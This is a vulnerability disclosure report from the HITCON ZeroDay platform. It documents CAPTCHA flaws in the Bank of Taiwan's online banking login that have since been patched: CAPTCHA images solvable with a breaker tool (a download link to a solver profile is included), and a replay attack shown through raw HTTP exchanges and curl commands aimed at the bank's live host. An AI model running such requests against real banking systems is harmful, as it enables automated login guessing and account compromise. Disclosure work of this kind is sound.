OO 銀行網銀多個驗證碼漏洞 - HITCON ZeroDay

Vulnerability Detail Report

Vulnerability Overview

  • ZDID: ZD-2016-00032
  • Vendor: 臺灣銀行
  • Title: OO 銀行網銀多個驗證碼漏洞
  • Introduction: 一個好的驗證碼機制不容易設計, 建議可參考現有的解決方案

處理狀態

目前狀態

公開
Last Update : 2016/11/09
  • 新提交
  • 已審核
  • 已通報
  • 已修補
  • 已複測
  • 公開

處理歷程

  • 2016/02/02 15:57:01 : 新提交 (由 [email protected] 更新此狀態)
  • 2016/02/05 03:40:34 : 審核完成 (由 HITCON ZeroDay 服務團隊 更新此狀態)
  • 2016/02/23 00:00:00 : 修補中 (由 HITCON ZeroDay 服務團隊 更新此狀態)
  • 2016/04/04 21:30:11 : 已修補 (由 HITCON ZeroDay 服務團隊 更新此狀態)
  • 2016/04/07 10:36:19 : 複審中 (由 HITCON ZeroDay 服務團隊 更新此狀態)
  • 2016/04/07 23:48:45 : 修補中 (由 HITCON ZeroDay 服務團隊 更新此狀態)
  • 2016/11/05 15:17:06 : 確認已修補 (由 HITCON ZeroDay 平台自動更新)
  • 2016/11/09 03:00:02 : 公開 (由 HITCON ZeroDay 平台自動更新)

詳細資料

  • ZDID:ZD-2016-00032
  • 通報者:chris ([email protected])
  • 風險:中
  • 類型:其他 (Other)

參考資料

暫無資料
(本欄位資訊由系統根據漏洞類別自動產生,做為漏洞參考資料。)

敘述

1 圖片識別

漏洞位置: 網路銀行 > 網路銀行登入

網頁請求:
GET /NetBank/NNBank/IISGenBMP/4192149A050B8B1034EB082F83343782/4192149A050B8B1034EB082F83343782.bmp HTTP/1.1
Host: ebank.bot.com.tw
Connection: close

網頁回應:
HTTP/1.1 200 OK
Content-Type: image/bmp
Last-Modified: Fri, 28 Dec 2007 08:56:52 GMT
Accept-Ranges: bytes
ETag: "0e2a8962f49c81:0"
Server: Microsoft-IIS/7.5
X-UA-Compatible: IE=EmulateIE7
Date: Tue, 02 Feb 2016 07:16:18 GMT
Connection: close
Content-Length: 21654
Set-Cookie: BankOfTaiwanCookie=2852432064.20480.0000; expires=Tue, 02-Feb-2016 10:16:19 GMT; path=/

BMT<略>

測試語法:
http://www.inetsolutions.org/gsa-captcha-breaker-ultimate-tutorial-and-honest-review-seo-software-of-the-gods/
http://rghost.net/download/8lyD6Sl44/1c0bd01748b24094b1fbe0eeeb5d5d2915a31e17/2016-02-02_eBanking_-_Bank_of_Taiwan_100.gcb

2 重送攻擊

漏洞位置: 網路銀行 > 網路銀行登入

網頁請求:
POST /NetBank/NNBank/NN/NPFrnCDInq.aspx?Task=Commit HTTP/1.1
Host: ebank.bot.com.tw
Connection: close
Content-Length: 138
Content-Type: application/x-www-form-urlencoded

tMode=&tCustPermId=A123456789&tCustLoginId=GG&tBrowser=Chrome&tImgPasswd=8216&tGenString=E9584B2F1DD57C5859CBB3809A0DA7E9&tCustVerifyCode=

網頁回應:
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=big5
Server: Microsoft-IIS/7.5
Set-Cookie: ASP.NET_SessionId=znndlrpenpkp4hct5uh53atb; path=/; HttpOnly
X-AspNet-Version: 4.0.30319
X-UA-Compatible: IE=EmulateIE7
Date: Tue, 02 Feb 2016 07:29:06 GMT
Connection: close
Content-Length: 41019
Set-Cookie: BankOfTaiwanCookie=2852432064.20480.0000; expires=Tue, 02-Feb-2016 10:29:07 GMT; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>臺灣銀行個金網-網路銀行登入</title>
<略>
</head>
<略>
<body onkeydown="keydown(event)">
<!--2008.10.01 mod by eddie for firefox Start-->
<form id="Form2" name="Form2" method="post" action=""></form>
<script type="text/javascript">ITrnTm = (new Date()).getTime();
var bChkImgPasswd = "True";
function CommitTask() {
if (bChkImgPasswd == "True") {
document.getElementById('Form2').action = "../NN/NNVerify.aspx?ITrnTm=" + ITrnTm + "&ISvcType=NPFrnCDInqRq&Mode=";
document.getElementById('Form2').submit();
}
}
function CheckData() {
if (bChkImgPasswd != "True") {
alert("很抱歉!圖形驗證碼輸入錯誤,請重新輸入圖形驗證碼。");
document.getElementById('Form2').action = "../NN/NPFrnCDInq.aspx?Task=";
document.getElementById('Form2').submit();
}
}
setTimeout("CheckData()", 0);
setTimeout("CommitTask()", 300);</script>
<!--2008.10.01 mod by eddie for firefox End-->

測試語法:
curl -d "tMode=&tCustPermId=A123456789&tCustLoginId=GG&tBrowser=Chrome&tImgPasswd=0000&tGenString=E9584B2F1DD57C5859CBB3809A0DA7E9&tCustVerifyCode=" "https://ebank.bot.com.tw/NetBank/NNBank/NN/NPFrnCDInq.aspx?Task=Commit" | iconv -f "big5" -t "utf-8" | grep "var bChkImgPasswd"
curl -d "tMode=&tCustPermId=A123456789&tCustLoginId=GG&tBrowser=Chrome&tImgPasswd=8216&tGenString=E9584B2F1DD57C5859CBB3809A0DA7E9&tCustVerifyCode=" "https://ebank.bot.com.tw/NetBank/NNBank/NN/NPFrnCDInq.aspx?Task=Commit" | iconv -f "big5" -t "utf-8" | grep "var bChkImgPasswd"

擷圖

留言討論

;